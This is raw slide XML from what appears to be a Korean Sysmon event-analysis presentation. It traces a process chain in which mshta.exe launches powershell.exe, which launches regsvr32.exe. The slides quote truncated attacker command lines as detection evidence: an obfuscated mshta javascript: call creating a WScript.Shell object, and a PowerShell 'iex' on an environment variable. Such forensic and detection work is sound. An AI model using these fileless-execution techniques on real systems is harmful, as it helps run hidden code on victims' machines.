          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7672985" y="6156770"/>
              <a:ext cx="32266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4EA0DFD-835F-4914-AE77-73741FECEA0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7569582" y="5676900"/>
              <a:ext cx="2971800" cy="17319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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>EventID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PID : 1418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7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endParaRPr lang="ko-KR" altLang="en-US" sz="24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8F268C5-4F45-4CF4-84F1-F098F8B48F2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10292355" y="5676900"/>
              <a:ext cx="4610100" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Psname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>powershell.exe</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PPID : 554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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p: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43943A8-7694-41D7-8430-1321B122DD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694932" y="6754174"/>
            <a:ext cx="0" cy="4977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7D6B611-FA18-4DEC-AB92-AC77988F4174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694932" y="7251932"/>
            <a:ext cx="4446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D16AB8B-DB6C-4E5B-B075-742F05D4A902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7778028" y="6845938"/>
            <a:ext cx="2971800" cy="1731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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>EventID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> : 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>PID : 1992</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="17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ko-KR" altLang="en-US" sz="2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9994B9-0FF6-464B-AC3A-5554B690A22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10401988" y="6845938"/>
            <a:ext cx="4610100" cy="1731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base" latinLnBrk="0" hangingPunct="1"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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Psname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>PPID : 1418</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="17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ko-KR" altLang="en-US" sz="2400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03FDFBF5-AFCA-4FC8-A86C-5AF74D4839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710" y="5391373"/>
            <a:ext cx="943553" cy="94355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4A17EB89-7D82-431D-973F-7903F444E8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709" y="6754174"/>
            <a:ext cx="943553" cy="94355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8403D2-35BA-42E7-983F-0DF9537F64D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275911" y="3390900"/>
            <a:ext cx="11736177" cy="5410200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A30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0692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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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772C818-3AC2-443B-A5F7-1A0EE1705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5637" y="-4456008"/>
            <a:ext cx="10262933" cy="265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9F96F9-106D-4547-AB7F-0EDAAA8318E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677013" y="2189366"/>
            <a:ext cx="2115336" cy="1128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base" latinLnBrk="0" hangingPunct="1"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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>EventID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> : 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>PID : 554</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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223B08-0CC8-44BE-872E-0C7206F80ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2337928" y="2181628"/>
            <a:ext cx="4610100" cy="1188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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>Psname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="17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ko-KR" altLang="en-US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FE800C-F435-4224-998D-A684F98277D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643051" y="3601419"/>
            <a:ext cx="73579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base" latinLnBrk="0" hangingPunct="1"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err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"C:\Windows\system32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>" javascript:ru6iBOzr="ZHS3UKugs";u69X=new%20ActiveXObject("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>");zK4dCA0g </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
              <a:latin typeface="+mn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9AE09B4-2994-4C8F-A49F-70E9CE2B5947}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="643050" y="5261672"/>
            <a:ext cx="6172200" cy="2966154"/>
            <a:chOff x="5715000" y="4915145"/>
            <a:chExt cx="6172200" cy="2966154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="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7D5AAF24-F12A-489C-B48D-66802BDDE4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4506"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="4915145"/>
              <a:ext cx="6172200" cy="1016351"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="그림 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70046A2D-D605-4905-A13F-E872054AF2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460" b="17518"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5715000" y="5926994"/>
              <a:ext cx="6172200" cy="1954305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4C8B1D-81D7-4737-A641-8DB1BF48B44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873933" y="8735080"/>
            <a:ext cx="6000640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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73E33F-9326-4F84-9DA7-F2401F80D3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580228" y="8735080"/>
            <a:ext cx="4588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EventID1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Rule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에 의해 탐지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6958534-5839-49A4-8FF1-D66E6C149BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643050" y="2105923"/>
            <a:ext cx="5787576" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A30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D51187-7D44-41F7-8EEB-CE6254F73D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9890637" y="2086911"/>
            <a:ext cx="6672150" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A30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5F5769E-F962-4CC4-9EC9-DDEFCFAEDB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10009587" y="2140621"/>
            <a:ext cx="6828687" cy="1764667"/>
            <a:chOff x="6543709" y="5261584"/>
            <a:chExt cx="6828687" cy="176466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395F34-72AC-4072-8E53-806AA69702FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6543709" y="5294302"/>
              <a:ext cx="2971800" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>EventID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PID : 1418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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2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AE1871-F7A1-4EBD-B5DE-B79F538DDC6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8762296" y="5261584"/>
              <a:ext cx="4610100" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Psname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>powershell.exe</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PPID : 554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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2400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71F122-1F2B-4539-9F90-37C21FB0AA8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9622503" y="5246574"/>
            <a:ext cx="6324600" cy="3044031"/>
            <a:chOff x="6857999" y="3763055"/>
            <a:chExt cx="5724526" cy="2822031"/>
          </a:xfrm>
        </p:grpSpPr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E213FCE5-10AE-4F69-8DAF-EFEF1E25D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028"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6858000" y="3763055"/>
              <a:ext cx="5724525" cy="1005689"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="그림 21" descr="텍스트이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA8CF5DC-5200-4A5A-858E-95916B29A9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855" b="16522"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6857999" y="4734800"/>
              <a:ext cx="5724525" cy="1850286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32063B5-4CD5-49EA-A8ED-E330EE47BB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009587" y="3608649"/>
            <a:ext cx="66771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 err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Cmdline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  "C:\Windows\System32\WindowsPowerShell\v1.0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>env:ouqapwd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78BC43B-0971-497D-A3AC-700E5FB29388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10562147" y="8735080"/>
            <a:ext cx="6000640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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F1D2A3-45C8-4FE1-91B6-F90872742553}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11268442" y="8735080"/>
            <a:ext cx="4588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EventID1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Rule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에 의해 탐지</a:t>
            </a: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5D629ED8-AECD-4033-AB77-74666DF6E1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209208" y="5815834"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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DD542E32-D028-48CA-AC76-81196E63B7C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17416805" y="5815834"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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887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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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772C818-3AC2-443B-A5F7-1A0EE1705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5637" y="-4456008"/>
            <a:ext cx="10262933" cy="265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4C8B1D-81D7-4737-A641-8DB1BF48B44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873933" y="8735080"/>
            <a:ext cx="6000640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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73E33F-9326-4F84-9DA7-F2401F80D3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580228" y="8735080"/>
            <a:ext cx="4588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EventID3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Rule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에 의해 탐지</a:t>
            </a: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5D629ED8-AECD-4033-AB77-74666DF6E1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209208" y="5815834"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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F55F8DA-7C12-4846-9066-5F44FE021AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643050" y="2105923"/>
            <a:ext cx="6500590" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A30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7F0792B-8973-435C-A4E5-015C6A3F670C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762000" y="2176953"/>
            <a:ext cx="6762266" cy="1747347"/>
            <a:chOff x="7778028" y="6845938"/>
